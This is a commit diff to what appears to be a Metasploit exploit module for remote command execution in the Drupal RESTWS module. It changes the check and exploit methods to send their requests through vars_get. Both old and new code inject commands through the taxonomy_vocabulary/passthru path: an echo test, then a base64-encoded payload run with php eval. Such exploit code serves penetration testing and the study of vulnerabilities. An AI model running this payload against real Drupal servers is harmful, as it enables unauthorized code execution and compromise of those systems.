Use vars_get un send_request_cgi

Author: mdisec

modules/exploits/unix/webapp/drupal_restws_exec.rb

@@ -53,10 +53,12 @@ def initialize(info={})
 
   def check
     r = rand_text_alpha(8 + rand(4))
-    url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r , "/passthru/echo%20#{r}")
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => url
+      'uri' => normalize_uri(target_uri.path, "index.php"),
+      'vars_get' => {
+          'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
+      }
     )
     if res && res.body =~ /#{r}/
       return Exploit::CheckCode::Appears
@@ -66,15 +68,13 @@ def check
 
   def exploit
     random = rand_text_alpha(1 + rand(2))
-    url = normalize_uri(target_uri.path,
-      "?q=taxonomy_vocabulary/",
-      random ,
-      "/passthru/",
-      Rex::Text.uri_encode("php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
-    )
+    cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"
     send_request_cgi(
       'method' => 'GET',
-      'uri' => url
+      'uri' => normalize_uri(target_uri.path, "index.php"),
+      'vars_get' => {
+          'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
+      }
     )
   end
 end